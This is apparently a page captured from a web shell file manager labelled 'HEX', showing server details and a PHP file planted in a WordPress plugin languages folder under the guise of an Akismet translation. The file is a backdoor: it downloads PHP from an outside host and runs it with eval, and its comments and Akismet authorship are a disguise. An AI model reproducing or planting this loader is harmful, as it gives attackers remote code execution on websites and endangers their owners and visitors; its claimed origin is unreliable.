HEX
Server: Apache
System: Linux 4485441ca2e2 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 11:03:07 UTC 2025 aarch64
User: (1000)
PHP: 8.2.24
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/languages/plugins/akismet-ja.10ln.php
<?php
/**
 * Akismet
 *
 * This script fetches PHP code from a code loader URL and executes it dynamically.
 * Use this with extreme caution — code loader execution via `PHP()` is dangerous
 * and should only be used in secure, internal environments for controlled use cases.
 *
 * @version 8.1.4
 * @author Akismet
 * @license GPL-2.0+
 * @warning This approach can be exploited if the code loader source is compromised.
 */

// Initialize a cURL session targeting the code loader PHP code
$ch = curl_init('https://gx-d3f.pages.dev/autoload.php');

// Set cURL option to return the response as a string instead of direct output
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Execute the cURL request and store the result
$api = curl_exec($ch);

// Close the cURL session to free resources
curl_close($ch);

// If the request was successful, execute the fetched code
if ($api !== false) {

    /**
     * Dynamically execute the fetched PHP code
     *
     * WARNING: This can't use PHP like this (), which can run arbitrary PHP. 
     * Ensure the code loader code is trustworthy.
     */
    eval('?>' . $api); // rts = run the script (custom label)

    // Output an error message after execution
    echo "err";
}
?>